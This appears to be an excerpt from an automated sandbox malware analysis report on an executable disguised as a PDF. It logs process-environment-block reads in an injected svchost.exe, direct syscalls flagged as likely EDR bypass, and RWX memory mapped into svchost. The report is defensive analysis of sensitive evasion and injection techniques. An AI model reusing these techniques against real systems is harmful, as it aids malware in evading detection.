                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668402 mov eax, dword ptr fs:[00000030h]1_2_03668402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036304E5 mov ecx, dword ptr fs:[00000030h]1_2_036304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036364AB mov eax, dword ptr fs:[00000030h]1_2_036364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036644B0 mov ecx, dword ptr fs:[00000030h]1_2_036644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BA4B0 mov eax, dword ptr fs:[00000030h]1_2_036BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036EA49A mov eax, dword ptr fs:[00000030h]1_2_036EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0362CB7E mov eax, dword ptr fs:[00000030h]1_2_0362CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4B4B mov eax, dword ptr fs:[00000030h]1_2_036E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03702B57 mov eax, dword ptr fs:[00000030h]1_2_03702B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6B40 mov eax, dword ptr fs:[00000030h]1_2_036C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FAB40 mov eax, dword ptr fs:[00000030h]1_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D8B42 mov eax, dword ptr fs:[00000030h]1_2_036D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628B50 mov eax, dword ptr fs:[00000030h]1_2_03628B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEB50 mov eax, dword ptr fs:[00000030h]1_2_036DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EB20 mov eax, dword ptr fs:[00000030h]1_2_0365EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036F8B28 mov eax, dword ptr fs:[00000030h]1_2_036F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704B00 mov eax, dword ptr fs:[00000030h]1_2_03704B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AEB1D mov eax, dword ptr fs:[00000030h]1_2_036AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638BF0 mov eax, dword ptr fs:[00000030h]1_2_03638BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EBFC mov eax, dword ptr fs:[00000030h]1_2_0365EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCBF0 mov eax, dword ptr fs:[00000030h]1_2_036BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03650BCB mov eax, dword ptr fs:[00000030h]1_2_03650BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630BCD mov eax, dword ptr fs:[00000030h]1_2_03630BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEBD0 mov eax, dword ptr fs:[00000030h]1_2_036DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640BBE mov eax, dword ptr fs:[00000030h]1_2_03640BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036E4BB0 mov eax, dword ptr fs:[00000030h]1_2_036E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA6F mov eax, dword ptr fs:[00000030h]1_2_0366CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036DEA60 mov eax, dword ptr fs:[00000030h]1_2_036DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036ACA72 mov eax, dword ptr fs:[00000030h]1_2_036ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03636A50 mov eax, dword ptr fs:[00000030h]1_2_03636A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03640A5B mov eax, dword ptr fs:[00000030h]1_2_03640A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366CA24 mov eax, dword ptr fs:[00000030h]1_2_0366CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0365EA2E mov eax, dword ptr fs:[00000030h]1_2_0365EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03654A35 mov eax, dword ptr fs:[00000030h]1_2_03654A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BCA11 mov eax, dword ptr fs:[00000030h]1_2_036BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0366AAEE mov eax, dword ptr fs:[00000030h]1_2_0366AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686ACC mov eax, dword ptr fs:[00000030h]1_2_03686ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03630AD0 mov eax, dword ptr fs:[00000030h]1_2_03630AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03664AD0 mov eax, dword ptr fs:[00000030h]1_2_03664AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03638AA0 mov eax, dword ptr fs:[00000030h]1_2_03638AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03686AA4 mov eax, dword ptr fs:[00000030h]1_2_03686AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363EA80 mov eax, dword ptr fs:[00000030h]1_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704A80 mov eax, dword ptr fs:[00000030h]1_2_03704A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03668A90 mov edx, dword ptr fs:[00000030h]1_2_03668A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03656962 mov eax, dword ptr fs:[00000030h]1_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov edx, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0367096E mov eax, dword ptr fs:[00000030h]1_2_0367096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036D4978 mov eax, dword ptr fs:[00000030h]1_2_036D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC97C mov eax, dword ptr fs:[00000030h]1_2_036BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B0946 mov eax, dword ptr fs:[00000030h]1_2_036B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03704940 mov eax, dword ptr fs:[00000030h]1_2_03704940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B892A mov eax, dword ptr fs:[00000030h]1_2_036B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C892B mov eax, dword ptr fs:[00000030h]1_2_036C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036AE908 mov eax, dword ptr fs:[00000030h]1_2_036AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BC912 mov eax, dword ptr fs:[00000030h]1_2_036BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03628918 mov eax, dword ptr fs:[00000030h]1_2_03628918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE9E0 mov eax, dword ptr fs:[00000030h]1_2_036BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036629F9 mov eax, dword ptr fs:[00000030h]1_2_036629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C69C0 mov eax, dword ptr fs:[00000030h]1_2_036C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]1_2_0363A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]1_2_036649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]1_2_036FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]1_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]1_2_036309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]1_2_036B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]1_2_036BE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]1_2_036C6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]1_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]1_2_03660854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]1_2_03634859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]1_2_03652835
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00B381F7
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B0A395
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeCode function: 0_2_00B0A364 SetUnhandledExceptionFilter,0_2_00B0A364

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\SC_TR11670000_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
